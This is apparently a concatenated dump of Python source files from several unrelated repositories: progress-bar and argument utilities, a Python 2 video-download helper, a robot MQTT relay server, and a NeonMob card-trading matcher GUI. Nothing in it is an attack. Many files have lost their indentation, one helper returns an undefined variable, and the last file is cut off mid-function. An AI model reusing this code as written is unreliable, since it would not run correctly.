            self.done() # finished
    # Refresh the bar display
def update(self):
if self.isDone:
return
self.displayed = True
percent = self.percent_current
ui_hd = self.ui_hd
if percent >= 100:
percent = 100
ui_hd = self.ui_fn
barleg = self.ui_leg - 1
num_left = int((percent/100) * barleg)
#print(percent)
num_right = barleg - num_left
barstr = (self.ui_fn*num_left
+ ui_hd
+ self.ui_lk*num_right
)
additiveTime = int(time.time()) - self.start_time
if additiveTime==0:
additiveTime = 1
#print(sec2time(additiveTime))
barstr = (self.label
+ self.ui_wl
+ barstr
+ self.ui_wr
)
        #format string for piece values
p_n_f = '%d'
ui_sp = self.ui_split
if self.sh_piece_division>1:
p_n_f = '%.2f'
if self.it_percent:
barstr += ui_sp+'%.2f'%percent + '%'
if self.it_perspeed:
perspeed = '%.2f'%(percent/additiveTime)
barstr += ui_sp+perspeed + '%/s'
if self.it_speed:
speed = p_n_f%((self.piece_current/self.sh_piece_division)/additiveTime)
barstr += ui_sp+speed + self.sh_piece_unit + '/s'
if self.it_piece:
barstr += (ui_sp+p_n_f%(self.piece_current/self.sh_piece_division)+self.sh_piece_unit
+'/'+p_n_f%(self.piece_total/self.sh_piece_division)+self.sh_piece_unit)
if self.it_time:
barstr += ui_sp+sec2time(additiveTime,fillzero=True,fillhour=True)
#print(num_left)
#print(barstr)
sys.stdout.write('\r'+barstr)
sys.stdout.flush()
    # Register a data-processing callback
    def filtrate(self,name,callback):
        self.filtrates[name] = callback
    # The bar has finished; close it
def done(self):
self.isDone = True
if self.displayed:
print()
self.displayed = False
## Command-line mapper
# Maps command-line arguments onto functions
class CommandDirect:
    def __init__(self
        , type='*' #unpack arguments as a positional list ('*') or keyword dict ('**')
        , main=None #main function
        ):
self.maps = {}
self.type = type
self.main = main
    ## Execute the routing
def __call__(self):
if not self.main:
self.direct()
return
        #invoke the handler
param = sys.argv[1:]
self.callfunc(self.main,param)
    ## Add a mapping from a command-line name to a function
def add(self,name,func):
self.maps[name] = func
    ## Invoke the handler
def callfunc(self,func,param):
if not param:
            func() #no arguments
return
tp = self.type
if '**'==tp:
            param = parse_argv(param) #unpack as keyword arguments
func(**param)
elif '*'==tp:
func(*param)
    ## Execute the routing
def direct(self):
if not sys.argv:
return
argv = sys.argv[1:]
if not argv:
return
name = argv[0]
maps = self.maps
if not name in maps:
return
param = argv[1:]
        #invoke the handler
self.callfunc(maps[name],param)
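# Editor's usage sketch (assumption, not part of the original module): map a
# sub-command name to a function and dispatch on sys.argv, e.g.
#   def greet(name): print('hi', name)
#   cd = CommandDirect()
#   cd.add('greet', greet)
#   cd()   # running `python tool.py greet Alice` would call greet('Alice')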
if __name__ == "__main__":
    print('### ProgressBar test')
    bar = ProgressBar(label='Bar: ', piece_total=99)
bar.face(
        ui_wl='[' #wrapper symbol on the left of the bar
        , ui_wr=']' #wrapper symbol on the right of the bar
        , ui_fn='=' #character for the completed part of the bar
        , ui_lk=' ' #character for the unfinished part of the bar
        , ui_hd='>' #head of the completed part of the bar
)
bar.step(10)
time.sleep(0.9)
bar.step(7)
time.sleep(0.8)
bar.step(11)
time.sleep(0.7)
bar.step(13)
time.sleep(0.6)
bar.step(9)
time.sleep(0.5)
bar.step(10)
time.sleep(0.4)
bar.step(10)
time.sleep(0.3)
bar.step(10)
time.sleep(0.2)
bar.step(10)
time.sleep(0.1)
bar.step(10)
'''
def to_native_string(s):
if type(s) == unicode:
return s.encode(default_encoding)
else:
return s
def r1(pattern, text):
m = re.search(pattern, text)
if m:
return m.group(1)
def r1_of(patterns, text):
for p in patterns:
x = r1(p, text)
if x:
return x
def unescape_html(html):
import xml.sax.saxutils
html = xml.sax.saxutils.unescape(html)
html = re.sub(r'&#(\d+);', lambda x: unichr(int(x.group(1))), html)
return html
def ungzip(s):
from StringIO import StringIO
import gzip
buffer = StringIO(s)
f = gzip.GzipFile(fileobj=buffer)
return f.read()
def undeflate(s):
import zlib
return zlib.decompress(s, -zlib.MAX_WBITS)
def get_response(url):
response = urllib2.urlopen(url)
data = response.read()
if response.info().get('Content-Encoding') == 'gzip':
data = ungzip(data)
elif response.info().get('Content-Encoding') == 'deflate':
data = undeflate(data)
response.data = data
return response
def get_html(url, encoding=None):
content = get_response(url).data
if encoding:
content = content.decode(encoding)
return content
def get_decoded_html(url):
response = get_response(url)
data = response.data
charset = r1(r'charset=([\w-]+)', response.headers['content-type'])
if charset:
return data.decode(charset)
else:
return data
def url_save(url, filepath, bar, refer=None):
headers = {}
if refer:
headers['Referer'] = refer
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
file_size = int(response.headers['content-length'])
assert file_size
if os.path.exists(filepath):
if file_size == os.path.getsize(filepath):
if bar:
bar.done()
print 'Skip %s: file already exists' % os.path.basename(filepath)
return
else:
if bar:
bar.done()
print 'Overwriting', os.path.basename(filepath), '...'
with open(filepath, 'wb') as output:
received = 0
while True:
buffer = response.read(1024*256)
if not buffer:
break
received += len(buffer)
output.write(buffer)
if bar:
bar.update_received(len(buffer))
assert received == file_size == os.path.getsize(filepath), '%s == %s == %s' % (received, file_size, os.path.getsize(filepath))
def url_size(url):
request = urllib2.Request(url)
request.get_method = lambda: 'HEAD'
response = urllib2.urlopen(request)
size = int(response.headers['content-length'])
return size
def url_size(url):
size = int(urllib2.urlopen(url).headers['content-length'])
return size
def urls_size(urls):
return sum(map(url_size, urls))
class SimpleProgressBar:
def __init__(self, total_size, total_pieces=1):
self.displayed = False
self.total_size = total_size
self.total_pieces = total_pieces
self.current_piece = 1
self.received = 0
def update(self):
self.displayed = True
bar_size = 40
percent = self.received*100.0/self.total_size
if percent > 100:
percent = 100.0
bar_rate = 100.0 / bar_size
dots = percent / bar_rate
dots = int(dots)
plus = percent / bar_rate - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
bar = '=' * dots + plus
bar = '{0:>3.0f}% [{1:<40}] {2}/{3}'.format(percent, bar, self.current_piece, self.total_pieces)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def update_received(self, n):
self.received += n
self.update()
def update_piece(self, n):
self.current_piece = n
def done(self):
if self.displayed:
print
self.displayed = False
class PiecesProgressBar:
def __init__(self, total_size, total_pieces=1):
self.displayed = False
self.total_size = total_size
self.total_pieces = total_pieces
self.current_piece = 1
self.received = 0
def update(self):
self.displayed = True
bar = '{0:>3}%[{1:<40}] {2}/{3}'.format('?', '?'*40, self.current_piece, self.total_pieces)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def update_received(self, n):
self.received += n
self.update()
def update_piece(self, n):
self.current_piece = n
def done(self):
if self.displayed:
print
self.displayed = False
class DummyProgressBar:
def __init__(self, *args):
pass
def update_received(self, n):
pass
def update_piece(self, n):
pass
def done(self):
pass
def escape_file_path(path):
path = path.replace('/', '-')
path = path.replace('\\', '-')
path = path.replace('*', '-')
path = path.replace('?', '-')
return path
def download_urls(urls, title, ext, total_size, output_dir='.', refer=None, merge=True):
assert urls
assert ext in ('flv', 'mp4')
if not total_size:
try:
total_size = urls_size(urls)
except:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
pass
title = to_native_string(title)
title = escape_file_path(title)
filename = '%s.%s' % (title, ext)
filepath = os.path.join(output_dir, filename)
if total_size:
if os.path.exists(filepath) and os.path.getsize(filepath) >= total_size * 0.9:
print 'Skip %s: file already exists' % filepath
return
bar = SimpleProgressBar(total_size, len(urls))
else:
bar = PiecesProgressBar(total_size, len(urls))
if len(urls) == 1:
url = urls[0]
print 'Downloading %s ...' % filename
url_save(url, filepath, bar, refer=refer)
bar.done()
else:
flvs = []
print 'Downloading %s.%s ...' % (title, ext)
for i, url in enumerate(urls):
filename = '%s[%02d].%s' % (title, i, ext)
filepath = os.path.join(output_dir, filename)
flvs.append(filepath)
#print 'Downloading %s [%s/%s]...' % (filename, i+1, len(urls))
bar.update_piece(i+1)
url_save(url, filepath, bar, refer=refer)
bar.done()
if not merge:
return
if ext == 'flv':
from flv_join import concat_flvs
concat_flvs(flvs, os.path.join(output_dir, title+'.flv'))
for flv in flvs:
os.remove(flv)
elif ext == 'mp4':
from mp4_join import concat_mp4s
concat_mp4s(flvs, os.path.join(output_dir, title+'.mp4'))
for flv in flvs:
os.remove(flv)
else:
print "Can't join %s files" % ext
def playlist_not_supported(name):
def f(*args, **kwargs):
raise NotImplementedError('Play list is not supported for '+name)
return f
def script_main(script_name, download, download_playlist=None):
if download_playlist:
help = 'python %s.py [--playlist] [-c|--create-dir] [--no-merge] url ...' % script_name
short_opts = 'hc'
opts = ['help', 'playlist', 'create-dir', 'no-merge']
else:
help = 'python [--no-merge] %s.py url ...' % script_name
short_opts = 'h'
opts = ['help', 'no-merge']
import sys, getopt
try:
opts, args = getopt.getopt(sys.argv[1:], short_opts, opts)
except getopt.GetoptError, err:
print help
sys.exit(1)
playlist = False
create_dir = False
merge = True
for o, a in opts:
if o in ('-h', '--help'):
print help
sys.exit()
elif o in ('--playlist',):
playlist = True
elif o in ('-c', '--create-dir'):
create_dir = True
elif o in ('--no-merge'):
merge = False
else:
print help
sys.exit(1)
if not args:
print help
sys.exit(1)
for url in args:
if playlist:
download_playlist(url, create_dir=create_dir, merge=merge)
else:
download(url, merge=merge)
'''
```
#### File: cutout/cutout/util.py
```python
import sys,re
import urllib.parse as urlparse
## Pad a value out to a given width
# @side which side to pad on: left or right
def fillside(stuff,width=None,fill=' ',side='left'):
if not width or not isinstance(width,int):
return stuff
stuff = str(stuff)
w = len(stuff)
if w > width:
return num
fillstr = fill * (width-w)
if side=='left':
return fillstr+stuff
elif side=='right':
return stuff+fillstr
else:
return stuff
## Clamp a number to the range [low, top]
def rangable(num,low=None,top=None):
if low and num<low:
return low
elif top and num>top:
return top
else:
return num
## Parse command-line arguments
# @kr character to strip from keys (the "-" prefix)
def parse_argv(argv, kr='-'):
    #argv = argv[1:] # drop the script name
leg = len(argv)
num = -1
redict = {}
#redict = dict( (k,v) for k in arg )
    while True: # loop over the arguments
num += 1
if num>=leg: break
if num%2: continue
k = argv[num].replace(kr,'')
v = argv[num+1] if num+1<leg else ''
redict[k] = v
return redict
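# Illustrative example (hypothetical argv):
#   parse_argv(['-width', '320', '-mode', 'fast'])  ->  {'width': '320', 'mode': 'fast'}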
## Convert a "h:m:s" timer string into a number of seconds
def time2sec(sTime):
leg = len(sTime)
    if leg<=5: # pad the missing hour field
sTime = '0:'+sTime
p="^([0-9]+):([0-5][0-9]):([0-5][0-9])$"
cp=re.compile(p)
try:
mTime=cp.match(sTime)
except TypeError:
return "[InModuleError]:time2sec(sTime) invalid argument type"
if mTime:
t = list(map(int,mTime.group(1,2,3)))
return 3600*t[0]+60*t[1]+t[2]
else:
return "[InModuleError]:time2sec(sTime) invalid argument value"
## Convert a number of seconds into a "h:m:s" timer string
# @fillzero whether to zero-pad each field
# @fillhour whether to always include the hour field
def sec2time(iItv,fillzero=True,fillhour=False):
if type(iItv)==type(1):
h=int(iItv/3600)
sUp_h=iItv-3600*h
m=int(sUp_h/60)
sUp_m=sUp_h-60*m
s=int(sUp_m)
time = (m,s)
if h>0 or fillhour: time = (h,m,s)
def fill_zero(num):
if num<10:
return '0'+str(num)
return str(num)
if not fillzero: fill_zero = str
return ":".join(map(fill_zero,time))
else:
return "[InModuleError]:sec2time(iItv) invalid argument type"
## URL-encode
def urlencode(stuff) :
if isinstance(stuff, dict):
return urlparse.urlencode(stuff)
elif isinstance(stuff, str):
return urlparse.quote(stuff)
## URL-decode
def urldecode(str) :
return urlparse.unquote(str)
``` |
{
"source": "jojo-/industry-4.0",
"score": 3
} |
#### File: industry-4.0/robot/server.py
```python
import asyncio
import struct
import math
import textwrap
import cayenne.client
import time
import threading
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
MQTT_USERNAME = "XXX"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "ZZZ"
# Connecting to Cayenne
print("Connecting to Cayenne...")
client = cayenne.client.CayenneMQTTClient()
client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
print("Done!")
# Reconnect to Cayenne every 45 seconds
def connect_cayenne_forever():
print("Keeping the connection to Cayenne...")
client.loop_forever()
#threading.Timer(45, reconnect_cayenne).start()
threading.Timer(1, connect_cayenne_forever).start()
# Micro server receiving data from the Robot
class ServerClientProtocol(asyncio.Protocol):
def connection_made(self, transport):
peername = transport.get_extra_info('peername')
print('Connection from {}'.format(peername))
self.transport = transport
def data_received(self, data):
print(len(data))
print(data)
# decoding the message
message = data.decode()
print('Data received: {!r}'.format(message))
value = int(message)
print('Data decoded: {}'.format(value))
# sending the message via MQQT
# client.loop()
channel = 1
client.virtualWrite(channel, value)
# closing the client socket
print('Close the client socket')
self.transport.close()
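# Minimal client-side sketch for local testing (not part of the original file; the
# host/port are assumed to match the server configured below, and the payload is an
# integer rendered as ASCII, which is what data_received() expects):
#   import socket
#   s = socket.create_connection(('192.168.2.20', 6000))
#   s.sendall(b'42')
#   s.close()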
loop = asyncio.get_event_loop()
# Each client connection will create a new protocol instance
coro = loop.create_server(ServerClientProtocol, '192.168.2.20', 6000)
server = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
print('Serving on {}'.format(server.sockets[0].getsockname()))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
``` |
{
"source": "jojojo8359/neonmobmatcher",
"score": 2
} |
#### File: jojojo8359/neonmobmatcher/guimaster.py
```python
import hashlib
import os
import sys
import traceback
import json
from json import JSONDecodeError
from os import path
import time
import webbrowser
import re
# pip packages
import PySimpleGUI as sg
import requests
sg.theme('DarkGrey9')
# Global variables
setdbpath = "db.json"
SETDB = []
TARGET = 0
AUTOUPDATE = True
recentpath = "recent.json"
RECENT = []
MAXRECENT = 30
SCACHE = {}
OCACHE = {}
keepalivemins = 10
# GENERAL I/O SECTION
# Database handling
def httperror(e):
"""Handles an HTTP Exception with PySimpleGUI
:param Exception e: The exception to display
"""
tb = traceback.format_exc()
sg.Print(f'An HTTP exception occurred. Here is the info:', e, tb)
sg.popup_error(f'AN HTTP EXCEPTION OCCURRED! Exiting...', e, tb)
def generalconnerror(e):
"""Handles a general connection error/exception with PySimpleGUI
:param Exception e: The exception to display
"""
tb = traceback.format_exc()
sg.Print(f'An exception occurred. Here is the info:', e, tb)
sg.popup_error(f'AN EXCEPTION OCCURRED! Exiting...', e, tb)
def fetchdb():
"""Gets the raw, most current set database file from GitHub (with connection exception handling)
:return: The raw database list
:rtype: List[Dict[str, Union[int, str, Dict[str, str]]]]
"""
try:
r = requests.request('GET', 'https://raw.githubusercontent.com/jojojo8359/neonmob-set-db/main/all-sets.json')
r.raise_for_status()
db = r.json()
return db
except requests.ConnectionError:
sg.popup_error('Connection error occurred! Exiting...')
sys.exit(1) # TODO: Rewrite error handling
except requests.exceptions.HTTPError as e:
httperror(e)
sys.exit(1)
except requests.exceptions.RequestException as e:
generalconnerror(e)
sys.exit(1)
def downloaddb():
"""Downloads and saves the latest set database in JSON form
"""
db = fetchdb()
with open(setdbpath, 'w') as f:
json.dump(db, f)
def fetchmd5():
"""Gets the raw, most current md5 hash of the set database from GitHub (with connection exception handling)
:return: The pure md5 hash of the database file
:rtype: str
"""
try:
r = requests.request('GET', 'https://raw.githubusercontent.com/jojojo8359/neonmob-set-db/main/all-sets.md5')
r.raise_for_status()
md5 = r.text
return md5.split(' ')[0]
except requests.ConnectionError:
sg.popup_error('Connection error occurred! Exiting...')
sys.exit(1)
except requests.exceptions.HTTPError as e:
httperror(e)
sys.exit(1)
except requests.exceptions.RequestException as e:
generalconnerror(e)
sys.exit(1)
def verify(truemd5):
"""Verifies a local set database file with a known md5 hash stored on GitHub
:param str truemd5: The known md5 hash from GitHub
:return: Whether or not the local hash matches the known hash
:rtype: bool
"""
try:
with open(setdbpath, 'rb') as f:
data = f.read()
returnedmd5 = hashlib.md5(data).hexdigest()
except OSError:
with open(setdbpath, 'w') as f:
f.write("[]")
return False
return truemd5 == returnedmd5
def updatedb(beannoying=True):
"""Handles updating the set database with PySimpleGUI interactions
:param bool beannoying: Whether or not to show a popup if the database is up to date
"""
if not verify(fetchmd5()):
result = sg.popup_yes_no('Database is not up to date. Download latest version?')
if result == 'Yes':
downloaddb()
if not verify(fetchmd5()):
sg.popup_error('Database is still not up to date, please update manually. https://github.com/jojojo8359/neonmob-set-db/blob/main/all-sets.json')
else:
                sg.popup_ok('Database has been successfully updated.')
else:
if beannoying:
sg.popup_ok('Database is up to date.')
def loadSetDB():
"""Loads the set database from a file and saves it into SETDB (global variable)
"""
global SETDB
try:
with open(setdbpath, 'r') as f:
SETDB = json.load(f)
except OSError:
with open(setdbpath, 'w') as f:
f.write("[]")
SETDB = []
def searchDB(query):
"""Given a query, searches the loaded set database for instances in the name of sets
If the set database has not yet been loaded, this function will load the database
:param str query: The substring query to search the database for
:return: The list of matching results from the database
:rtype: List[Dict[Union[str, int], Union[int, str, Dict[str, str]]]]
"""
global SETDB
if not SETDB:
loadSetDB()
filtered = list(filter(lambda series: query.lower() in series['name'].lower() or query.lower() in series['name_slug'].lower(), SETDB))
# filtered = list(filter(lambda series: query.lower() in series['creator']['username'].lower() or query.lower() in series['creator']['name'].lower(), SETDB))
# Use the above to search through creator names/usernames or just `series['id']` for set ids
filtered.reverse()
return filtered
# Settings handling
def loadSettings():
"""Loads custom user settings from a file, then updates global variables
If no settings are saved, the default settings saved in this file are written into the settings file
"""
global setdbpath, MAXRECENT, keepalivemins, AUTOUPDATE
new = False
try:
with open('settings.json', 'r') as f:
saved = json.load(f)
if saved != {}:
setdbpath = saved['setdbpath']
MAXRECENT = saved['maxrecent']
keepalivemins = saved['keepalivemins']
AUTOUPDATE = saved['autoupdate']
else:
new = True
except OSError:
saveSettings()
except JSONDecodeError:
saveSettings()
if new:
saveSettings()
def saveSettings():
"""Saves custom user settings to a file by reading global variables
"""
global setdbpath, MAXRECENT, keepalivemins, AUTOUPDATE
with open('settings.json', 'w') as f:
json.dump({'setdbpath': setdbpath, 'maxrecent': MAXRECENT, 'keepalivemins': keepalivemins, 'autoupdate': AUTOUPDATE}, f)
# History/Recent Handling
def loadRecent():
"""Loads the most recent sets that were searched for from a file and saves them into RECENT (global variable)
"""
global RECENT, recentpath
try:
with open(recentpath, 'r') as f:
RECENT = json.load(f)
except OSError:
saveRecent()
except JSONDecodeError:
saveRecent()
def saveRecent():
    """Truncates the recent-sets list to MAXRECENT entries and saves it to a file
"""
global RECENT, MAXRECENT, recentpath
del RECENT[MAXRECENT:]
with open(recentpath, 'w') as f:
json.dump(RECENT, f)
# Cache Handling
def loadCards(setid):
"""Loads cached card list for a specified series
:param int setid: The id of the set to load cards for
:return: A list of cards in the set or int 0 if the proper file was not found
:rtype: Union[List[Dict[str, Union[str, int]]], int]
"""
if path.exists('cache/cards/' + str(setid) + '.json'):
with open('cache/cards/' + str(setid) + '.json', 'r') as f:
cards = json.load(f)
return cards
else:
return 0
def saveCards(setid, cards):
"""Saves the card list for a specified series in cache
    :param int setid: The id of the set to save cards of
:param List[Dict[str, Union[str, int]]] cards: A list of cards in the set
"""
if not path.exists('cache/'):
os.mkdir('cache/')
if not path.exists('cache/cards/'):
os.mkdir('cache/cards/')
with open('cache/cards/' + str(setid) + '.json', 'w') as f:
json.dump(cards, f)
def loadCache():
"""Loads the saved seeker and owner cache from their respective files
"""
global SCACHE, OCACHE
if not path.exists('cache/'):
os.mkdir('cache/')
if not path.exists('cache/scache.json'):
saveCache()
if not path.exists('cache/ocache.json'):
saveCache()
with open('cache/scache.json', 'r') as f:
SCACHE = json.load(f)
with open('cache/ocache.json', 'r') as f:
OCACHE = json.load(f)
def saveCache():
"""Save seeker and owner caches to their respective files
"""
global SCACHE, OCACHE
with open('cache/scache.json', 'w') as f:
json.dump(SCACHE, f)
with open('cache/ocache.json', 'w') as f:
json.dump(OCACHE, f)
def purgeCache():
"""Remove any entries from seeker and owner caches that have "expired" (based on the time limit)
"""
global SCACHE, OCACHE
loadCache()
currentMillis = int(round(time.time() * 1000))
for k in list(SCACHE.keys()):
if currentMillis - SCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del SCACHE[k]
for k in list(OCACHE.keys()):
if currentMillis - OCACHE[k]['time'] >= (keepalivemins * 60 * 1000):
del OCACHE[k]
saveCache()
def deleteCache():
"""Remove all entries from seeker and owner caches
"""
with open('cache/scache.json', 'w') as f:
json.dump({}, f)
with open('cache/ocache.json', 'w') as f:
json.dump({}, f)
# MAIN API/NETWORKING SECTION
def GetCards(setid, force=False):
"""Fetches a list of cards for any given series
:param int setid: The series id to get cards from
:param bool force: Whether or not to disregard cards stored in cache
:return: A list of cards in the given set
:rtype: List[Dict[str, Union[str, int]]]
"""
cards = loadCards(setid)
if cards != 0 and not force:
print("Card found in cache")
return cards
set_url = "https://www.neonmob.com/api/setts/" + str(setid) + "/"
data = requests.request('GET', set_url).json()
set_name = data['name']
# total = 0
# for cat in range(len(data['core_stats'])):
# total += data['core_stats'][cat]['total']
# for cat in range(len(data['special_stats'])):
# total += data['special_stats'][cat]['total']
# print("\nGetting cards from series \"" + set_name + "\"...")
cards = []
raw = requests.request('GET', "https://www.neonmob.com/api/sets/" + str(setid) + "/piece-names")
data = raw.json()
for card in data:
cards.append({'name': card['name'],
'rarity': card['rarity']['name'],
'id': card['id'],
'setName': set_name})
saveCards(setid, cards)
return cards
def GetSeekers(card, force=False):
"""Fetches a list of seekers for any given card
:param Dict[str, Union[str, int]] card: The card to search for seekers of
:param bool force: Whether or not to disregard non-expired users in the cache
:return: A list of seekers of the specified card
    :rtype: List[Dict[str, Union[int, float, str, List[Dict[str, Union[str, int]]]]]]
"""
global SCACHE, SEARCHING
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in SCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - SCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return SCACHE[str(card['id'])]['seekers']
# print("\nGetting seekers of " + card['name'] + " [" + str(card['id']) + "]...")
seekers = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/needers/?completion=desc&grade=desc&wishlisted=desc").json()
total = data['count']
i = 0
canceled = False
while True:
if canceled:
break
nxt = data['next']
for seeker in data['results']:
seekers.append({'id': seeker['id'],
'name': seeker['name'],
'trader_score': seeker['trader_score'],
'wants': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'rarity': card['rarity'],
'wishlisted': seeker['wishlisted'],
'total_specials': seeker['special_piece_count'],
'specials': seeker['owned_special_piece_count'],
'percentage': seeker['owned_percentage']
}
],
'owns': []
})
i += 1
if not sg.one_line_progress_meter("Fetching seekers...", i, total, "Getting seekers of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h', key='-SEEKERBAR-'):
canceled = True
break
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
if len(seekers) != total:
SEARCHING = False
return -1
try:
SCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
SCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'seekers': seekers}})
saveCache()
return seekers
def GetOwners(card, force=False):
"""Fetches a list of owners for any given card
:param Dict[str, Union[str, int]] card: The card to search for owners of
:param bool force: Whether or not to disregard non-expired users in the cache
:return: A list of owners of the specified card
    :rtype: List[Dict[str, Union[int, float, str, List[Dict[str, Union[str, int]]]]]]
"""
global OCACHE, SEARCHING
purgeCache()
if card['id'] == -1:
print("\nCouldn't find card " + card['name'] + " in set " + card['setName'])
return []
currentMillis = int(round(time.time() * 1000))
if str(card['id']) in OCACHE.keys() and not force:
print("Card is in cache")
if currentMillis - OCACHE[str(card['id'])]['time'] < (keepalivemins * 60 * 1000):
print("Time is under 10 minutes")
return OCACHE[str(card['id'])]['owners']
# print("\nGetting owners of " + card['name'] + " [" + str(card['id']) + "]...")
owners = []
data = requests.request('GET', "https://www.neonmob.com/api/pieces/" + str(card['id']) + "/owners/?completion=asc&grade=desc&owned=desc").json()
total = data['count']
i = 0
canceled = False
while True:
if canceled:
break
nxt = data['next']
for owner in data['results']:
owners.append({'id': owner['id'],
'name': owner['name'],
'trader_score': owner['trader_score'],
'owns': [
{
'card_id': card['id'],
'card_name': card['name'],
'set_name': card['setName'],
'rarity': card['rarity'],
'print_count': owner['print_count'],
'total_specials': owner['special_piece_count'],
'specials': owner['owned_special_piece_count'],
'percentage': owner['owned_percentage']
}
],
'wants': []
})
i += 1
if not sg.one_line_progress_meter('Fetching owners...', i, total, "Getting owners of " + card['name'] + " [" + str(card['id']) + "]...", orientation='h', key='-OWNERBAR-'):
canceled = True
break
if not nxt:
break
data = requests.request('GET', "https://www.neonmob.com" + nxt).json()
if len(owners) != total:
SEARCHING = False
return -1
try:
OCACHE.pop(str(card['id']))
except KeyError:
print("Card is not in cache")
currentMillis = int(round(time.time() * 1000))
OCACHE.update({card['id']: {'time': currentMillis, 'cardName': card['name'], 'setName': card['setName'], 'owners': owners}})
saveCache()
return owners
# DATA PROCESSING SECTION
def processSets(results):
"""Process set results to be displayed in the set selection window
:param List[Dict[str, Union[int, str, Dict[str, str]]]] results: A list of raw set results
:return: A list of processed results in table form
    :rtype: List[List[Union[str, int]]]
"""
rows = []
for item in results:
if item['edition_size'] == 'unlimited':
char = '∞'
else:
char = 'LE'
name = item['name']
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
"]+", flags=re.UNICODE)
rows.append([emoji_pattern.sub(r'', name), item['creator']['name'], char, item['id']])
return rows
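# Illustrative example (hypothetical minimal set record):
#   processSets([{'name': 'Foo', 'edition_size': 'unlimited', 'creator': {'name': 'Bar'}, 'id': 7}])
#   ->  [['Foo', 'Bar', '∞', 7]]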
def processCards(results):
"""Process card results to be displayed in the card selection window
:param List[Dict[str, Union[str, int]]] results: A list of raw card results
:return: A list of processed results in table form
:rtype: List[List[Union[str, int]]]
"""
rows = []
for item in results:
rows.append([item['rarity'], item['name'], item['setName'], item['id']])
return rows
def processResults(results):
"""Process trade search results to be displayed in the results window
:param List[Dict[str, Union[int, str, float, List[Dict[str, Union[str, int]]]]]] results: A list of raw trade search results
:return: A list of processed results in table form
:rtype: List[List[Union[str, int]]]
"""
rows = []
for person in results:
rows.append([person['name'], parseTraderGrade(person['trader_score']),
len(person['owns']), len(person['wants']), person['id']])
return rows
def parseTraderGrade(grade):
"""Converts a decimal trader grade into a text representation (defined by NeonMob)
:param float grade: The decimal trader grade to convert
:return: The text representation of the given trader grade
:rtype: str
"""
grades = ['F', 'F+', 'D-', 'D', 'D+', 'C-', 'C', 'C+', 'B-', 'B', 'B+', 'A-', 'A', 'A+']
return grades[int(grade)]
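# Illustrative examples:
#   parseTraderGrade(0.5)   ->  'F'
#   parseTraderGrade(12.3)  ->  'A'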
def combinePeople(nestedlist1, nestedlist2):
"""Combines all people (dictionaries) from two lists, merging data along the way
For example, if a person is found once in both given lists, the cards they own and need will be combined into one person object and included in the result
:param List[List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]] nestedlist1: The first list of raw people data
:param List[List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]] nestedlist2: The second list of raw people data
:return: A list of unique people whose attributes have been combined
:rtype: List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]
"""
master = []
allids = []
list1 = []
for larg in nestedlist1:
list1.extend(larg)
for larg in nestedlist2:
list1.extend(larg)
for person in list1:
if person['id'] not in allids:
master.append(person)
allids.append(person['id'])
else:
currentindex = [i for i, t in enumerate(master) if t['id'] == person['id']][0]
currentperson = master[currentindex]
for i in range(len(person['owns'])):
check = True
for j in range(len(currentperson['owns'])):
                    if person['owns'][i]['card_id'] == currentperson['owns'][j]['card_id']:
check = False
if check:
currentperson['owns'].append(person['owns'][i])
for i in range(len(person['wants'])):
check = True
for j in range(len(currentperson['wants'])):
                    if person['wants'][i]['card_id'] == currentperson['wants'][j]['card_id']:
check = False
if check:
currentperson['wants'].append(person['wants'][i])
return master
def getCommons(people, owned, want, mode='and', checkprintcount=False):
"""Finds users who have and want specific cards
:param List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]] people: A list of people to search through
:param List[int] owned: A list of user-owned card ids to check
:param List[int] want: A list of user-wanted card ids to check
:param str mode: 'and' will require all card conditions to be met, while 'or' requires at least one card condition on each side of the trade to be met
:param bool checkprintcount: Whether or not to include users with single copies (False will search for singles, True will not)
:return: A list of users who meet the conditions specified
:rtype: List[Dict[str, Union[int, str, float, List[Dict[str, Union[int, str]]]]]]
"""
master = []
if mode == 'and':
for person in people:
mastercheck = True
if len(person['owns']) == 0 or len(person['wants']) == 0:
continue
# print("Person does not have empty lists")
for ownedid in owned:
cardcheck = False
for ownedcard in person['owns']:
if checkprintcount and ownedcard['print_count'] < 2:
break
elif ownedid == ownedcard['card_id']:
cardcheck = True
break
if not cardcheck:
mastercheck = False
break
for wantedid in want:
cardcheck = False
for wantedcard in person['wants']:
if wantedid == wantedcard['card_id']:
cardcheck = True
break
if not cardcheck:
mastercheck = False
break
if mastercheck:
master.append(person)
elif mode == 'or':
for person in people:
mastercheck = False
printcheck = True
if len(person['owns']) == 0 or len(person['wants']) == 0:
continue
for ownedid in owned:
cardcheck = False
for ownedcard in person['owns']:
if checkprintcount and ownedcard['print_count'] >= 2:
printcheck = False
if ownedid == ownedcard['card_id']:
